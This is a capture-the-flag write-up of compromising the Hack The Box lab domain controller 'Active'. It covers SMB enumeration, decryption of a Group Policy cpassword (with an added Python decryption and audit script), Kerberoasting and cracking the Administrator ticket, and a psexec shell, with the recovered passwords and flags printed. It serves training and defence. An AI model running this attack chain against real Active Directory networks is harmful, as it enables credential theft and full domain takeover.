Info
CTF URL: https://app.hackthebox.com/machines/148
IP: 10.10.10.100
Difficulty: Easy
Reconnaissance
NMAP
nmap -p- -sS -sC -sV 10.10.10.100 -v --min-rate 10000
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-31 08:08:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-31T08:09:01
|_ start_date: 2024-07-29T09:53:28
|_clock-skew: -1m02s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Users/Groups/Domain Enum
Get Domain Name
crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
active.htb
Kerbrute
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt
./kerbrute userenum xato-net-10-million-usernames.txt --dc 10.10.10.100 -d active.htb
kerbrute2userlist.sh:
#!/bin/bash
# Usage: kerbrute2userlist.sh <kerbrute userenum log>
# Turns the "[+] VALID USERNAME:" lines of a kerbrute log into two wordlists.
LOG_FILE=$1
USERNAMES_WITH_DOMAIN="$LOG_FILE.users_with_domain.txt"   # output file name is assumed; the original name was garbled
USERNAMES_WITHOUT_DOMAIN="$LOG_FILE.users.txt"
# Keep only the VALID USERNAME lines and take the user@domain token after the last colon
# (kerbrute separates it with a tab and a space, so split on any whitespace, not only spaces).
grep 'VALID USERNAME' "$LOG_FILE" | awk -F':[[:space:]]+' '{print $NF}' | tr '[:upper:]' '[:lower:]' | sort -u > "$USERNAMES_WITH_DOMAIN"
# Strip the @domain suffix for tools that want bare usernames.
awk -F'@' '{print $1}' "$USERNAMES_WITH_DOMAIN" | sort -u > "$USERNAMES_WITHOUT_DOMAIN"
echo "Usernames with domain saved to $USERNAMES_WITH_DOMAIN"
echo "Usernames without domain saved to $USERNAMES_WITHOUT_DOMAIN"
enum4linux
enum4linux 10.10.10.100
=================================( Share Enumeration on 10.10.10.100 )=================================
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication is the interesting one: it maps and lists without credentials.
Connecting to share
smbclient //10.10.10.100/Replication -N
Recurse on
prompt off
mget *
# there is a file like this in the listing
...
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
...
# get it
get Groups.xml
Foothold as SVC_TGS
Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Useful information
active.htb\SVC_TGS
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Let's decrypt the cpassword with gpp-decrypt
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
# result
GPPstillStandingStrong2k18
active.htb\SVC_TGS:GPPstillStandingStrong2k18
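The same check as an added example (not part of the original write-up): a small Python audit that parses Group Policy Preferences XML such as the Groups.xml above, reports every item carrying a cpassword attribute, and decrypts it with the AES key Microsoft published for GPP (the weakness fixed by MS14-025) when pycryptodome is installed. The sample XML is constructed from the file shown above; GPP_AES_KEY, ACCOUNT_ATTRS and the function names are this example's own.

```python
"""Audit Group Policy Preferences XML for cpassword attributes (MS14-025)."""
import base64
import xml.etree.ElementTree as ET

# Static AES-256 key Microsoft published for GPP cpassword encryption; the IV is all zeros.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Attributes that name the account in the different preference types (Groups, Services, Tasks, DataSources).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample with the same structure and values as the Groups.xml pulled from the Replication share.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""


def find_cpasswords(xml_text):
    """Return one finding per preference item that carries a non-empty cpassword."""
    findings = []
    for item in ET.fromstring(xml_text):          # <User>, <Service>, <Task>, ... entries
        for props in item.iter("Properties"):
            cpassword = props.get("cpassword")
            if not cpassword:
                continue
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), item.get("name"))
            findings.append({"account": account, "changed": item.get("changed"), "cpassword": cpassword})
    return findings


def decode_cpassword(cpassword):
    """GPP strips the base64 padding; restore it before decoding (gpp-decrypt does the same)."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def decrypt_cpassword(cpassword):
    """AES-256-CBC with the public key and a zero IV, PKCS#7 unpad, then UTF-16LE.
    Returns None when pycryptodome is not installed."""
    try:
        from Crypto.Cipher import AES
    except ImportError:
        return None
    plaintext = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(decode_cpassword(cpassword))
    return plaintext[: -plaintext[-1]].decode("utf-16-le")


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{f['account']} (changed {f['changed']}): {len(decode_cpassword(f['cpassword']))}-byte ciphertext,"
              f" password {decrypt_cpassword(f['cpassword']) or '<install pycryptodome to decrypt>'}")
```

Run it over every *.xml under SYSVOL\<domain>\Policies to find any preference item that still ships a cpassword; the fix is to delete the item, not just the password, and to rotate the account.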
Use Credentials
# let's check credentials
crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
# shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
smbclient //10.10.10.100/Users -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
smb: \SVC_TGS\Desktop\> get user.txt
cat user.txt
a073f1af8a2d80a283bd2bf27d11708c
Kerberoast
Request a service ticket for the SPN account and crack it offline for the password
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/GetUserSPNs.py
python3 GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
# ticket hash (truncated here), saved to hash.txt:
# $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e0e3007e948fbe2d199baa153b309a6c$…
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
# found!
Ticketmaster1968
Login as Administrator
# get a shell
impacket-psexec 'administrator:Ticketmaster1968@10.10.10.100'
# then
C:\Users\Administrator\Desktop> type root.txt
4e2687c66d48d5f96374b13f9234dc3d